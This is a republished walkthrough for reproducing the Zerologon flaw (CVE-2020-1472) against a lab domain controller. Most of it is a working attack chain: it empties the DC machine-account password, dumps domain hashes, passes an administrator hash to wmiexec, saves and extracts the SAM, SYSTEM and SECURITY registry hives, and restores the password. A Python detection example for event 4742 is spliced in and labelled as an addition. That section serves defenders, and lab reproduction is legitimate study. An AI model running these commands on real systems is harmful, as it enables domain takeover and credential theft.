
How to reproduce the CVE-2020-1472 vulnerability

2025-02-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31

This article shows how to reproduce the CVE-2020-1472 vulnerability. The editor finds it very practical and shares it here in the hope that you will learn something from reading it.

The following is only a record of reproducing the vulnerability. The exploitation process is as follows:

1. Reproduction environment

Win7 jump host IP: 192.168.52.143

Win2008 domain controller IP: 192.168.52.138

2. Exploitation process

Check whether the domain controller is vulnerable

python zerologon_tester.py owa 192.168.52.138

Use the exploitation tool to set the password of the domain controller's machine account to empty. This step may cause the domain controller to drop out of the domain, so the hash needs to be restored promptly.

python set_empty_pw.py owa 192.168.52.138

Then dump the domain controller's hashes using the empty password

python secretsdump.py god.org/"owa$"@192.168.52.138 -no-pass

Then use the hash to obtain domain administrator privileges through wmiexec.py

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:81be2f80d568100549beac645d6a7141 administrator@192.168.52.138

Execute the following commands to save the registry hives that hold the target's original hash

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

Download them.

get system.save

get sam.save

get security.save

After that, you can extract the original hash from them.

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Restore the domain controller hash

python reinstall_original_pw.py owa 192.168.52.138 75c1f14a63ee00aef8a5200eeff2bf88

Authenticate the connection with an empty password

The domain controller hash has been restored
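From the defender's side, the machine-account password reset in the second step is commonly detected through Security event 4742 ("A computer account was changed") on the domain controller, where the target is the DC's own machine account and the subject is ANONYMOUS LOGON. The following Python code is an added example, not part of the original article: the event records are constructed, and `DC_ACCOUNTS`, `make_event`, `find_suspect_resets` and the `stu1$` account are names assumed for illustration.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ANONYMOUS_SID = "S-1-5-7"   # well-known SID of ANONYMOUS LOGON
DC_ACCOUNTS = {"owa$"}      # assumption: machine accounts of your domain controllers

def make_event(event_id, time, target, subject_sid, pwd_last_set):
    """Build a constructed Security-log event in the Windows event XML layout."""
    data = {"TargetUserName": target, "SubjectUserSid": subject_sid,
            "PasswordLastSet": pwd_last_set}
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{time}"/></System>'
            f'<EventData>{fields}</EventData></Event>')

# Constructed sample records, not taken from a real host.
SAMPLE_EVENTS = [
    # routine machine-account password rotation performed as SYSTEM
    make_event(4742, "2020-09-20T03:00:11Z", "owa$", "S-1-5-18", "9/20/2020 3:00:11 AM"),
    # attribute change without a password change ("-" means unchanged)
    make_event(4742, "2020-09-20T07:41:50Z", "owa$", "S-1-5-18", "-"),
    # DC machine-account password set by an unauthenticated caller
    make_event(4742, "2020-09-20T08:15:02Z", "owa$", ANONYMOUS_SID, "9/20/2020 8:15:02 AM"),
    # workstation account, outside the default DC_ACCOUNTS scope
    make_event(4742, "2020-09-20T08:20:00Z", "stu1$", ANONYMOUS_SID, "9/20/2020 8:20:00 AM"),
]

def find_suspect_resets(xml_events, dc_accounts=DC_ACCOUNTS):
    """Return (time, account) for each DC machine-account password change by ANONYMOUS LOGON."""
    hits = []
    for raw in xml_events:
        root = ET.fromstring(raw)
        if root.findtext("e:System/e:EventID", namespaces=NS) != "4742":
            continue
        data = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}
        if (data.get("TargetUserName", "").lower() in dc_accounts
                and data.get("SubjectUserSid") == ANONYMOUS_SID
                and data.get("PasswordLastSet", "-") != "-"):
            when = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
            hits.append((when, data["TargetUserName"]))
    return hits

if __name__ == "__main__":
    for when, account in find_suspect_resets(SAMPLE_EVENTS):
        print(f"{when} password of {account} changed by ANONYMOUS LOGON")
```

A hit on this rule also means the machine account password in Active Directory no longer matches the one stored on the domain controller, which is the out-of-domain condition the article warns about.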

The above is how to reproduce CVE-2020-1472. The editor believes it covers some knowledge points that we may see or use in our daily work, and hopes you can learn more from this article.
